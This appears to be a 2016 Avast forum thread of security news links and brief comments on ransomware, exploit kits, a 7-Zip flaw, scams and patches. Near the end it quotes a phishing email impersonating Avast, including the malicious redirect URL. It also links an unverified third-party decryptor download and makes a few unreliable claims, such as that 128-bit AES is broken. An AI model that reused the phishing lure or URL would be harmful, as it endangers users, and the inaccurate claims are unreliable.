Webserver security, seems only 0,1% is doing it right: http://www.theregister.co.uk/2016/03/24/see_a_pin_and_pick_it_up_for_the_sake_of_security/
Security headers, not a lot get to A+ status, and many land into the Hall of Shame: https://securityheaders.io/
polonus (volunteer website security analyst and website error-hunter)
-
Further to Petya ransom ware
It is important to note that there is a lot of bad information on the web about how how to fix your computer when it has been encrypted by Petya. Many of these sites state that you can use the FixMBR command or repair your MBR to remove the infection. Though this will indeed remove the lock screen, it will not decrypt your MFT and thus your files and Windows will still be inaccessible. Only repair the MBR if you do not care about any lost data and want to reinstall Windows.
The MFT (Master File Table) is sometimes corrupted. If Microsoft's Checkdisk (chkdsk) failed to repair the MFT, run TestDisk. In the Advanced menu, select your NTFS partition, choose Boot, then Repair MFT. TestDisk will compare the MFT and MFT mirror (its backup). If the MFT is damaged, it will try to repair the MFT using the backup. If the MFT backup is damaged, it will use the main MFT.
If both MFT and MFTMirr are damaged and thus cannot be repaired using TestDisk,
http://www.bleepingcomputer.com/news/security/petya-ransomware-skips-the-files-and-encrypts-your-hard-drive-instead/
-
Google Safebrowsing - Enhancing state-sponsored attack warnings: https://security.googleblog.com/2016/03/more-encryption-more-notifications-more.html
pol
-
Sophisticated USB Trojan Spotted in the Wild
http://www.securityweek.com/sophisticated-usb-trojan-spotted-wild
http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/
Samples used by ESET
https://virustotal.com/en/file/9b07058b787c40aead135554108d12d4edde6b9d3dd5847a0cf4c03eb55cae50/analysis/
https://virustotal.com/en/file/f2734d702a76fddcf1f6683b289b3d68cbece905ec6a4951ecf500ef8ee966ab/analysis/
https://virustotal.com/en/file/8e7f3a2e664e530015fd20fc4034bb957c97da500564d0d9354127896b6458cd/analysis/
https://virustotal.com/en/file/a5b504fced6daf4f58989e7451441a2281d5e494dcf973ce19308da5e07514cc/analysis/
https://virustotal.com/en/file/b297ef8df5c954a033c9c40200619f9a0c61d57bdd86197e36c92e3397913c48/analysis/
-
See why hacking a human is easier: http://computerworld.nl/uploads/z/c/zc67z0r97i9bmqx1.png (link from SmartFile dot com)
polonus
-
App Critical Security Update: http://blog.truecaller.com/security-update-notification/
pol
-
major Samba exploit inbound http://badlock.org/
reveal at April 12th
-
SSL Security. SSL should be a word of the past now. The recent protocol is TLS.
Look in the ´virus and worms´for all the security issues I came up with there in various postings.
We also almost drown in `DROWn´, mainly in nameservers and for reversed DNS.
It is almost a free security course for those interested ;) but the amount of incompetence is often shocking
and might set your security and privacy further at risk.
Data hunger in an insecure environment is as real a threat as threats can be.
polonus
-
New ransomware ”PowerWare” uses native Windows function to encrypt files
http://www.myce.com/news/new-ransomware-powerware-uses-native-windows-function-encrypt-files-78976/?utm_content=bufferefc7f&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer
Two days ago
https://www.virustotal.com/en/file/02beca974ecc4f871d8d42462ef305ae595fb6906ad764e6e5b6effe5ff05f29/analysis/
-
Hej Pondus,
I heard that Windows end-users could adopt their registry to be protected against that form of ransom malware threat. Probably essexboy knows how to implement this? Some AV will brew up some anti-ransomware vaccination. Will Avast? It is getting to be a big problem for some.
polonus
-
Light reading here http://www.windowsecurity.com/articles-tutorials/windows_os_security/PowerShell-Security.html
Theoretically a .ps should not run unless the shell is running
Another default setting that is directly related to security is the fact that all scripts must be run interactively. This is a security measure that ensures that PowerShell scripts cannot be executed from a script based virus. This means that you must be at the PowerShell interface and run the script in real time for it to function.
However, there have been powershell script running from the registry
-
Thank you, essex, for setting this out to us.
No reason to panic, but we must take care
and keep all hands on deck.
polonus
-
A Look Back on Misleading Advertising
https://blog.malwarebytes.org/cybercrime/2016/03/a-look-back-on-misleading-advertising/?utm_source=gplus&utm_medium=social
Top Exploit Kits Round Up | March Edition
https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016/03/top-exploit-kits-round-up-march-edition/?utm_source=gplus&utm_medium=social
-
Alert from my daily scanning experiences:
Loads of servers do not have this Public-Key-Pins set. Also CloudFlare has this insecurity! This we can establish from a Symantic Crypto URL Scan on the Certificate(s): Public-Key-Pins HTTP Public Key Pinning protects your site from MiTM attacks using rogue X.509 certificates. By whitelisting only the identities that the browser should trust, your users are protected in the event a certificate authority is compromised. Certificate is not in Google's EV whitelist.
polonus (volunteer website security analyst and website error-hunter)
-
https://twitter.com/PayloadSecurity/status/717088767396462592
https://www.hybrid-analysis.com/sample/ec08037187d4fad9476e7ee742d226f97ab2f0a7e82964e16a7716076675c350?environmentId=1
More info in Spanish: http://nyxbone.com/malware/russianRansom.html
-
Are Exploit Kits Doomed? New F-Secure Threat Report Says Yes
https://www.f-secure.com/en/web/press_global/news/news-archive/-/journal_content/56/1075444/1551427?p_p_auth=Afyyx1oa&refererPlid=1081937
Exploits, which have become one of the most common vehicles for malware in the past decade, need out-of-date software in order to accomplish their goal of getting through security holes. But that software, Sullivan says, will be harder and harder to find. For example, with HTML 5's capability to "do it all", the need for third party browser plugins has mostly been eliminated. And today's browsers themselves are auto-updated, without the need for the user to intervene, so users always have the latest version.
-
Are Exploit Kits Doomed? New F-Secure Threat Report Says Yes
https://www.f-secure.com/en/web/press_global/news/news-archive/-/journal_content/56/1075444/1551427?p_p_auth=Afyyx1oa&refererPlid=1081937 (https://www.f-secure.com/en/web/press_global/news/news-archive/-/journal_content/56/1075444/1551427?p_p_auth=Afyyx1oa&refererPlid=1081937)
Exploits, which have become one of the most common vehicles for malware in the past decade, need out-of-date software in order to accomplish their goal of getting through security holes. But that software, Sullivan says, will be harder and harder to find. For example, with HTML 5's capability to "do it all", the need for third party browser plugins has mostly been eliminated. And today's browsers themselves are auto-updated, without the need for the user to intervene, so users always have the latest version.
As we can see here, auto-updates is a good thing.
Why isn't it also considered good when Avast decided to implement it with it's program ??? "Program updates will now be set to Auto by default."
-
Firefox browser is in need of a new secure extension sandbox. Why? Read here: http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/
polonus
-
Firefox browser is in need of a new secure extension sandbox. Why? Read here: http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/ (http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/)
polonus
By now, we should all have realized that the only way to be totally safe from all of the dangers of the internet,
is to totally avoid ever visiting it. Since that's impossible unless you want to become a total hermit, we simply need to accept
that using modern technology and browsing the internet also exposes us to certain dangers.
We can only learn to minimize these dangers. We can never totally avoid them with out avoiding the internet.
-
One out of five businesses are infected by Malware through Social Media
http://www.pandasecurity.com/mediacenter/social-media/uh-oh-one-out-of-five-businesses-are-infected-by-malware-through-social-media/
-
Internet giants join forces to reinforce email security with a new protocol
http://www.pandasecurity.com/mediacenter/security/internet-giants-join-forces-to-reinforce-the-email-with-a-new-protocol/
-
(http://screencast-o-matic.com/screenshots/u/Lh/1460057976493-21357.png)
FBI spills iPhone hacking secret to Senators (http://www.cnet.com/news/fbi-spills-iphone-hacking-secret-to-senators/?ftag=CAD1acfa04&bhid=19917032625079717126003489967847)
Now everyone will know. :o The crooks already knew how. :)
-
Giorgio Maone, the developer of NoScript, in a reaction to the new extension insecurity found up for firefox extensions:
https://hackademix.net/2016/04/08/crossfud-an-analysis-of-inflated-research-and-sloppy-reporting/
It needs the eye of the experienced security researcher to smell out code with malicious intent right away.
And I can agree hearing a lot of script music will make that you could better discerns between real music and dissonants,
aka benevolent coding and code wrought by malcreants for malicious purposes.
A whitelisting of browser extensions however could be a good thing, I do not like mine to come with hidden crap like adware etc.
pol
-
Various Malware Including Crypto Ransomware Now Used in Email Phishing Scams
http://www.trendmicro.no/vinfo/no/security/news/cybercrime-and-digital-threats/various-malware-including-crypto-ransomware-now-used-in-email-phishing-scams
-
What security admins are putting off but better should implement right away: http://www.theregister.co.uk/2016/04/08/weekend_reading_five_security_things_youre_not_doing_but_should/
Article by Darren Pauli on an advice by SANS' Johannes Ullrich.
polonus
-
End2end encryption may be on the line: http://www.theregister.co.uk/2016/04/08/draft_of_encryptionborking_bill_floated/
"For the first time in America, companies who want to provide their customers with stronger security would not have that choice – they would be required to decide how to weaken their products to make you less safe."
For one thing, it will kill end-to-end encryption.
polonus
-
seems like this went unnoticed (if anyone posted sorry, I didn't see)
http://www.theregister.co.uk/2016/04/04/spies_rejoice_gmail_facebook_messenger_breached_once_again/
http://www.pcworld.com/article/3051675/http-compression-continues-to-put-encrypted-communications-at-risk.html
technically any cipher suite lower than 256bit (e.g. 128bit AES or w/o) are on risk (vulnerable aka dead)) get rid of anything RC4, MD5, SHA-1 and obscure etc.
https://www.blackhat.com/docs/asia-16/materials/asia-16-Karakostas-Practical-New-Developments-In-The-BREACH-Attack.pdf
https://raw.github.com/dionyziz/rupture/develop/etc/Black%20Hat%20Asia%202016/asia-16-Practical-New-Developments-In-The-BREACH-Attack-wp.pdf
time to toss away TLS 1.0 and also TLS 1.1 and use only TLS 1.2 (or 1.3 when it comes) !
get rid of weak and weird cipher suites !
and consider to deploy 'SameSite' set-Cookie header flag https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-3.1
-
Thanks, Dwarden, for the heads-up on this one.
Another development for WordPress: https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/
I'd rather would like to see a secure implementation of htps everywhere and we should really test at https://www.ssllabs.com/ssltest/
The only advantage is admins can log-on somewhat more securely now.
Why the browser warns on a self-signed certificate and not for third party Let's Encrypt Certificates? Average users cannot distinct anymore between a real secure non-EV certificate and a Let's Encrypt 'toy'-one. And exploit attacks can now be performed over https-only.
Some tips to better protect your log-on credentials.
Admins should have two accounts, one for daily use and one for special tasks.
Memebers of Admin-groups should have zero permanent users and users with authentication should rotate to perform certain tasks.
Use 2FA to protect against Phishing Attacks that are after your credentials.
Administration should always be performed by users without full admin rights.
With rights there should be the possibility that such rights could be withdrawn,
whenever such a task has been performed.
This is called Just in Time administration.
Applications should be performed according to a specific authentication role system.
Administration task should only be performed on high end security machines,
so-called dedicated systems.
A physical environment is always more secure than a virtual one.
There should not be browser hanging onto such a system or
there should be room to set up connections to or receive connections from internet addresses.
But also on the local user level the structures should be secure for exploit,
that may also endanger higher levels.
Tips from Roger A.Grimes.
polonus
-
Microsoft Security Bulletin Summary for April 2016
https://technet.microsoft.com/en-us/library/security/ms16-apr.aspx
-
Time to uninstall QuickTime for Windows
http://www.ghacks.net/2016/04/15/uninstall-quicktime-for-windows/
-
Trend Micro's blog about QuickTime for Windows
http://blog.trendmicro.com/urgent-call-action-uninstall-quicktime-windows-today/
-
Another Java Flaw (Java sandbox bypass) coming to revisit us after we met it in 2013, read: http://www.security-explorations.com/materials/SE-2012-01-IBM-5.pdf
Researcher Gowdiak writes that IBM old patch closed off the proof-of-concept attack without considering all possible code paths to the vulnerability.: “There were no security checks introduced anywhere in the code. The patch primarily addressed the scenario illustrated by the Proof of Concept code. It didn't take into account all code paths that could be used to reach the vulnerable code sequence”,
pol
-
Why one should always install security updates: http://blog.talosintel.com/2016/04/jboss-backdoor.html
Also read: https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ & http://www.pcworld.com/article/2064580/hackers-actively-exploiting-jboss-vulnerability-to-compromise-servers-researchers-say.html
polonus
-
MIT reveals AI platform which detects 85 percent of cyberattacks
http://www.zdnet.com/article/mit-reveals-ai-platform-which-detects-85-percent-of-cyberattacks/
-
2F Security, turn it on to keep hackers at bay even when they knew your password: https://www.turnon2fa.com/
But do not mark your device as trusted on websites that offer 2F protection. It might be more user friendly, but is not good protection-wise.
And when you loose your Android you never know whether it could become unlocked. In the worst scenario services will provide you with a back-up phone number to recover your account. Keep info you only know to claim your account back. Info credits: Lucian Constantin
polonus
P.S. The diasadvantage of 2F is that it can be used against you on certain occasions/circumstances by authorities for instance, in that case there is nothing better than a really good strong old-fashioned password that you will keep to yourself. That is a decision you should make yourselves.
D
-
Java Critical Security Update http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
more details in https://forum.avast.com/index.php?topic=9671.10200
-
here we go again
ESET reports new Facebook scam
http://www.arnnet.com.au/article/598266/eset-reports-new-facebook-scam/
here in Norway the file name is said to be V1DE0-[variable number].html
-
here we go again
ESET reports new Facebook scam
http://www.arnnet.com.au/article/598266/eset-reports-new-facebook-scam/ (http://www.arnnet.com.au/article/598266/eset-reports-new-facebook-scam/)
here in Norway the file name is said to be V1DE0-[variable number].html
It's actually an old scam that's been around for quite q while.
1. don't click on links you don't know.
2. never download a player to watch something you didn't really ask for in the first place.
-
Hackers stole $80 million from a central bank because it had $10 routers and no firewall
http://www.businessinsider.com/r-bangladesh-bank-exposed-to-hackers-by-cheap-switches-no-firewall-police-2016-4?IR=T
-
Tech Support Scammers Bring Back FakeAV
https://blog.malwarebytes.org/cybercrime/2016/04/tech-support-scammers-bring-back-fakeav/
-
Apple ID expiry scam tricks users into handing over their passwords and bank details
http://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-id-password-expired-expiry-text-website-scam-phishing-a6991126.html
-
HPSBGN03580 rev.1 - HP Data Protector, Remote Code Execution, Remote Unauthorized Disclosure of Information
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988
-
Malcreants way ahead of defenders. Often third party security researchers detect.
Read: http://www.theregister.co.uk/2016/04/26/verizon_breach_report/
polonus
-
Malcreants way ahead of defenders. Often third party security researchers detect.
Read: http://www.theregister.co.uk/2016/04/26/verizon_breach_report/ (http://www.theregister.co.uk/2016/04/26/verizon_breach_report/)
polonus
That's not really news Damien,
The infection or Malware always comes first. :)
-
Another Day, Another Hack: 7 Million Accounts for Minecraft Community ‘Lifeboat’
http://motherboard.vice.com/read/another-day-another-hack-7-million-emails-and-hashed-passwords-for-minecraft
-
12 million computers backdoored: http://blog.talosintel.com/2016/04/the-wizzards-of-adware.html
pol
-
US govt quietly tweaks rules to let cops, Feds hack computers anywhere, anytime
http://www.theregister.co.uk/2016/04/29/us_government_proposes_rule_41_change/
-
They act like they own every device on earth, well Internet backbone is theirs.
US Navy Intel white lodge folks had a great service developed once called tor for such occasion,
so use tor on your vpn log-in.
polonus
-
Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html
-
Researchers say there are serious security problems in Samsung’s SmartThings
http://www.theverge.com/2016/5/2/11540246/samsung-smart-things-security-study-critical-flaw-apps
-
Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html
OpenSSL Security Advisory [3rd May 2016]
https://www.openssl.org/news/secadv/20160503.txt
-
Exclusive: Big data breaches found at major email services
http://www.reuters.com/article/us-cyber-passwords-idUSKCN0XV1I6
HOLD SECURITY RECOVERS 272 MILLION STOLEN CREDENTIALS FROM A COLLECTOR
http://holdsecurity.com/news/the_collector_breach/
-
Microsoft - Changes to Security Update Links
https://blogs.technet.microsoft.com/msrc/2016/04/29/changes-to-security-update-links/
-
Microsoft - Changes to Security Update Links
https://blogs.technet.microsoft.com/msrc/2016/04/29/changes-to-security-update-links/ (https://blogs.technet.microsoft.com/msrc/2016/04/29/changes-to-security-update-links/)
Some additional information:
(http://screencast-o-matic.com/screenshots/u/Lh/1462449666881-83008.png)
-
5 year old Android hole: https://www.fireeye.com/blog/threat-research/2016/05/exploiting_cve-2016-.html
polonus
-
10.000's of sites risk being hacke due to security problems in ImageMagic
https://imagetragick.com/
-
VirusTotal: Maintaining a healthy community
http://blog.virustotal.com/2016/05/maintaining-healthy-community.html
http://www.reuters.com/article/us-cybersecurity-sharing-virustotal-anal-idUSKCN0XY0R4
-
The broader the spectrum the less chance for "conservative protective measures" and other power arming measures.
Hope those that were dropped will find their way here: http://support.clean-mx.de/clean-mx/login.php
VT should not think they have the final word where malware detection is concerned.
Do not underestimate the Google influence here as well. Why Avast Mobile apps, Google Mobile apps and AdBlockPlus app are always targeted by adware app detection, because of AdMob insecurity built in that enable Google adtracking. When those solutions that were dropped however do alert AdMob = Google Adware Mobile Tracking, they could threaten "vested interests", certain agreements made by larger companies to partner with Google. They will never admit to it, but I wonder whether that did not come to play here in the background...
polonus
-
Microsoft Security Bulletin Summary for May 2016
https://technet.microsoft.com/library/security/ms16-may
-
ASUS - After installing Microsoft Update KB3133977 for Windows 7, some users may encounter a "Secure Boot Violation" , which makes the system fail to boot into the operating system
https://www.asus.com/support/FAQ/1016356/
-
ASUS - After installing Microsoft Update KB3133977 for Windows 7, some users may encounter a "Secure Boot Violation" , which makes the system fail to boot into the operating system
https://www.asus.com/support/FAQ/1016356/
I think we need to get used to this with Win10 and its Auto Updates, acting as KB beta testers for business users Win10 Pro, etc.
-
Alert (TA16-132A) - Exploitation of SAP Business Applications
https://www.us-cert.gov/ncas/alerts/TA16-132A
https://www.onapsis.com/threat-report-tip-iceberg-wild-exploitation-cyber-attacks-sap-business-applications
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
-
Americans worried about Internet Privacy: https://www.ntia.doc.gov/blog/2016/lack-trust-internet-privacy-and-security-may-deter-economic-and-other-online-activities
Do not put out there what you wanna keep to yourself.
polonus
-
http://news.softpedia.com/news/ss7-attack-leaves-whatsapp-and-telegram-encryption-useless-503894.shtml
that's what happens when mobile world uses 40 years standard as base layer
-
Seems to be a new trick / scam.
Fake product key popup
https://forums.malwarebytes.org/topic/183142-product-key-malware/
The phone number listed on the popup is used it many previous scam > Google search
https://www.google.no/search?num=50&newwindow=1&site=&source=hp&q=8444598882&oq=8444598882&gs_l=hp.3...1664.34389.0.40370.10.10.0.0.0.0.53.424.10.10.0....0...1c.1.64.hp..0.5.227...0j0i131j0i30j0i5i30.OCT1GE3olo8&gws_rd=cr&ei=F7w5V7PdNcyLsAHFwae4Dg#newwindow=1&q=1-844-459-8882
-
GoDaddy closed an XSS hole on their account customer support: http://www.theregister.co.uk/2016/05/10/godaddy_plugs_account_hijack_xss_vulnerability/
customer accounts could have been totally compromised through the XSS payload...
pol
-
Comics: cybercriminals meeting in the flesh sometimes:
https://threatpost.com/cyber-criminal-underground-comics-edition-102210/74587/
pol
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
OK, seeing as Avast! uses a 7zip module, (1) is this being addressed in an upgrade, or (2) can we simply replace the dll/module?
I have already upgraded my PeaZip, but...
Gordon.
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/ (http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/)
OK, seeing as Avast! uses a 7zip module, (1) is this being addressed in an upgrade, or (2) can we simply replace the dll/module?
I have already upgraded my PeaZip, but...
Gordon.
Please note,
"The security vulnerability has been fixed in 7-Zip 16.0 which has been released this month."
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
OK, seeing as Avast! uses a 7zip module, (1) is this being addressed in an upgrade, or (2) can we simply replace the dll/module?
<snip>
What makes you think that avast uses 7zip ?
As far as I'm aware it doesn't install it, it only reports 7zip in the Software Updater if you have it installed.
-
What makes you think that avast uses 7zip ?
This:
(https://www.dropbox.com/s/ah63ah4il50zwsv/AboutAvast.png?dl=1)
@bob3160 - ""The security vulnerability has been fixed in 7-Zip 16.0 which has been released this month." - Ah yes, but has Avast installed the upgrade?
Gordon.
-
Avast staff will have to answer this question, regarding whether 7-zip libraries have been updated in Avast.
-
What makes you think that avast uses 7zip ?
This:
(https://www.dropbox.com/s/ah63ah4il50zwsv/AboutAvast.png?dl=1)
@bob3160 - ""The security vulnerability has been fixed in 7-Zip 16.0 which has been released this month." - Ah yes, but has Avast installed the upgrade?
Gordon.
OK, now it's clear, but only when I viewed the code of your post as the image isn't being displayed, as the URL tag doesn't fetch the image, nor is it displaying the code. It's only seen if you look at the underlying code. Which I couldn't see, you would have to have downloaded it (if you could actually see the URL).
[img]https://www.dropbox.com/s/ah63ah4il50zwsv/AboutAvast.png?dl=1[/img]
It didn't need a quote of bob3160's post, you could have attached an image of your about.avast screen (which I have just done).
-
I am using older version of MBAM (1.75) and I replaced 7z.dll in MBAM Program Files folder with 7z.dll from
7-Zip 16.0 Portable and everything is working fine.
I am not sure, but I think Avast uses 7-Zip only in installer.
-
I am using older version of MBAM (1.75) and I replaced 7z.dll in MBAM Program Files folder with 7z.dll from
7-Zip 16.0 Portable and everything is working fine.
I am not sure, but I think Avast uses 7-Zip only in installer.
Whilst there is nothing definitive on what avast uses 7zip for, but it wouldn't be unreasonable to think it could be used for unpacking files that are going to be scanned.
-
Avast will need update the library, just like any other sane security software did ...
-
Microsoft releases unofficial service pack for Windows 7
http://www.extremetech.com/computing/228779-microsoft-releases-unofficial-service-pack-for-windows-7
-
Avast will need update the library, just like any other sane security software did ...
Avast isn't vulnerable. This should answer your question:
https://blog.avast.com/avast-software-updater-can-help-protect-you-from-security-loopholes-like-the-recent-7-zip-vulnerabilities
-
Most WordPress sites hacked through three vulnerable (outdated) plug-ins: RevSlider- & GravityForms-plug-ins and the TimThumb-script. A quarter of all hacked WordPress sites had a vulnerable version of just these scripts. When pages are being hacked through outdated software, attackers will place a PHP-backdoor (66%). Why webmasters do not update and patch? :o
Read about it here: https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf
polonus
-
FBI asks technology firms like Google etc. not to offer end2end encryption as by default (standard),
but only when users opt-in. Google did so with Google Allo, only icognito-mode comes with a stronger encryption.
Compliance to FBI-demands is better than later having to look for an excuse when backdoors in your software are being detected.
That is not making your software look too good, isn't it? No explanations to make is always better.
Read: https://twitter.com/csoghoian/status/733088078311489540
So encryption will not come as by default, turning the tecnologically unaware user into a potential FBI surveillance victim.
When we wanna protect ourselves we again have to fend for ourselves.
polonus
-
Avast will need update the library, just like any other sane security software did ...
Avast isn't vulnerable. This should answer your question:
https://blog.avast.com/avast-software-updater-can-help-protect-you-from-security-loopholes-like-the-recent-7-zip-vulnerabilities
so if I toss on avast specially crafted file with those exploits masked as 7zip format it shall not break ...
{crunch crunch}
-
Magento 2.0.6 Security Update
https://magento.com/security/patches/magento-206-security-update
-
Avast will need update the library, just like any other sane security software did ...
Avast isn't vulnerable. This should answer your question:
https://blog.avast.com/avast-software-updater-can-help-protect-you-from-security-loopholes-like-the-recent-7-zip-vulnerabilities
so if I toss on avast specially crafted file with those exploits masked as 7zip format it shall not break ...
{crunch crunch}
Actually it probably will try. First and most important: Avast is not compromised. However, if Avast opens a v15 7z archive which contains a crafted file, then if the file contains the arbitrary code which the attacker wants executed, then that code will be executed as the result of the UDF vulnerability. And you should then see (if the code has a sig or does things Avast doesn't like) Avast swing into action and throw the file in the Chest. I doubt that Avast would be damaged, but OTOH, if the attacker is very very clever and is aiming at Avast...?
The important question here is "Has Avast updated its engine to replace any v15 7-Zip with v16 7-Zip? And if not, when?"
Gordon.
-
Did you read the blog post provided by Bob..!?
Avast is not affected by these vulnerabilities, but if you are a non-Avast user we recommend you update your antivirus software, if you haven’t done so already.
-
Did you read the blog post provided by Bob..!?
Avast is not affected by these vulnerabilities, but if you are a non-Avast user we recommend you update your antivirus software, if you haven’t done so already.
Reading is important, Comprehension is paramount. :)
-
LinkedIn - Protecting Our Members
https://blog.linkedin.com/2016/05/18/protecting-our-members
-
Being quite thin-skinned, I assume youse are talking to me... 8)
Did you read the blog post provided by Bob..!?
Avast is not affected by these vulnerabilities, ...
Reading is important, Comprehension is paramount. :)
Ummm... What part of
First and most important: Avast is not compromised.
was not understood?
I repeat my important question:
The important question here is "Has Avast updated its engine to replace any v15 7-Zip with v16 7-Zip? And if not, when?"
That's all.
Gordon.
-
I'd suggest to start a new topic, if further discussion is needed.
-
Censorship of our online views slowly brought in, read:
http://www.independent.co.uk/voices/facebook-is-censoring-our-views-and-this-is-feeding-extremism-a7029251.html
Also: https://www.facebook.com/notes/people-over-politics/popaction-alert-facebook-censorship-is-on-the-rise-take-action-now/519387508074020/
polonus
-
TYPO3-CORE-SA-2016-013: Missing Access Check in TYPO3 CMS
https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2016-013/
-
Error with CryptXXX-decryptor tool, get working tool here: https://www.dropbox.com/s/blaw1yn295s5a9a/New_DeCrypt.rar?dl=0
polonus
-
Mittigate Blue Coat Symantec intermediate certificate abuse scandal, read: Untrusting the intermediate CA: https://blog.filippo.io/untrusting-an-intermediate-ca-on-os-x/
polonus
-
6,7% of the most popular website tries to block users with adblockers, read this report: https://www.lightbluetouchpaper.org/2016/05/28/adblocking-and-counter-blocking-a-slice-of-the-arms-race/
The underlying problems however have never been tackled as to question why users use adblockers in the first place.
For me the moment to not block ads would arrive as there came a guarantee from a particular adblocking website that it was 100% malvertiser free. But no one at this moment can guarantee there would be no more malad on pages that block adblockers. Whenever there was a guarantee that adlaunchers would dicriminate between a fraudulent and an honest adware buck, I would allow their honest upright ad. As this situation still seems a long, long time off if it will ever arrive, I keep my adblock visors up and even have some special third party lists installed (JoeWein, feodotracker etc.).
polonus
-
Possibly some others have come across this already even though this is apparently 'New'
http://www.msn.com/en-us/money/technology/this-serpent-like-malware-lies-dormant-until-you-access-your-bank-account/ar-BBtyEST?li=BBnbfcL&ocid=HPCDHP (http://www.msn.com/en-us/money/technology/this-serpent-like-malware-lies-dormant-until-you-access-your-bank-account/ar-BBtyEST?li=BBnbfcL&ocid=HPCDHP)
-
Thanks goes out to our forum friend, schmidthouse, for posting the link.
This thread is one I always come back to visit and when I read something that I think will help our community members with better securing their bits and bytes, I do not hesitate to post. Again thanks to Avast to provide us with this great knowledge forum.
Avast has outbuilded me over a decade to be the volunteer website analysis security guy and website error-hunter, I am to-day.
Now the heads-up on these, outdated vulnerable WordPress plug-ins vulnerability, always a risk, but specially these like old Ninja Forms and others like it, read:
https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
polonus
-
Security Advisory: Stored XSS in Jetpack
https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
-
Just received an e-mail with a possible ransom dropper attached.. Avast does not detect but I have sent a copy to Maxx
VT scan https://www.virustotal.com/en/file/4c84eeab806646862e79fbf6f610d6c46ac11a68e0cb7e11d8aa9434c7579503/analysis/1464701568/
-
Statistics gathered by US cyber-security firm Fortinet reveal that, between April 1, 2016, and May 15, 2016, the top five most prevalent ransomware families were in this order: CryptoWall (41.04%), Locky (34.36%), Cerber (24.17%), TorrentLocker (0.24%), and TeslaCrypt (0.09%).
-
rumor about some TeamViewer security issues
https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/
-
Extortion E-mail Schemes Tied to Recent High-Profile Data Breaches
http://www.ic3.gov/media/2016/160601.aspx
-
WP Mobile Detector Vulnerability being abused in the wild:
https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
Around 2000 sites run this plug-in.
polonus
-
rumor about some TeamViewer security issues
https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/ (https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/)
This may help:
http://www.howtogeek.com/257376/how-to-lock-down-teamviewer-for-more-secure-remote-access/
-
Obsolete WordPress and Drupal - hacks may have been possible thanks to such CMS vuln:
http://www.theregister.co.uk/2016/06/01/cms_vulns_rife_in_top_uk_companies_wordpress_drupal/
link article author = John Leyden.
pol
-
The impact of misconfigured NFS-servers is terabytes and terabytes of data-leakage:
https://blog.fortinet.com/2016/05/30/misconfigured-nfs-servers-put-thousands-of-terabytes-of-data-at-risk
3400 vulnerable servers just in the Netherlands.
Everyone can install an application out of the box,
but not everyone can configure according to best practices,
safely and securely. :o
polonus
-
rumor about some TeamViewer security issues
https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/
TeamViewer denies hack after PCs hijacked, PayPal accounts drained
http://www.theregister.co.uk/2016/06/01/teamviewer_mass_breach_report/
-
TECH SUPPORT SCAM
http://www.ic3.gov/media/2016/160602.aspx
-
TECH SUPPORT SCAM
http://www.ic3.gov/media/2016/160602.aspx
http://prntscr.com/bc9pzn
^^Updates neccessary.
-
some friend receive mail supposed to from avast, but its fake because the link send to another site and claim to scan mail
the mail show the link to go as http://scan.avast.com/email?id=hugoc@vcing.com.ar
but in reality this fake link direct to to a http://zonefitness.com.ng/snookie/crypted/index.php?email=hugoc@vcing.com.ar
Buen día Carlos!
Que puede ser esto?
Hugo
De: Avast.com [mailto:security@avast.com]
Enviado el: lunes, 06 de junio de 2016 10:19 a.m.
Para: hugocorti@valcan-ingenieria.com.ar
Asunto: Your mailbox is infected with deadly virus. Run email scan now!
Avast Internet Security
Dear hugoc@vcing.com.ar,
Our spider detected 5 deadly trojans in your mailbox today.
If left unchecked, this can lead to a total email shutdown or loss of important data.
To protect your email data, follow the URL below to scan your E-mail for free.
http://scan.avast.com/email?id=hugoc@vcing.com.ar
*Note: This will serve as a final notification to this threat.
Source: Avast Internet Security
Safe Mail: This email has been checked for viruses by Avast antivirus software.
Libre de virus. www.avast.com
-
@ mismac
This topic is more of an informative one rather than a specific system related issue. So really should be in its own topic.
That said there is another topic on this scam/phishing attempt, see https://forum.avast.com/index.php?topic=187151.0 (https://forum.avast.com/index.php?topic=187151.0) and whatever you do don't go clicking any links on this email.
-
Another Day, Another Hack: User Accounts of Dating Site Badoo
http://motherboard.vice.com/en_uk/read/another-day-another-hack-user-accounts-of-dating-site-badoo
-
ANGLER EXPLOIT KIT EVADING EMET
https://www.fireeye.com/blog/threat-research/2016/06/angler_exploit_kite.html
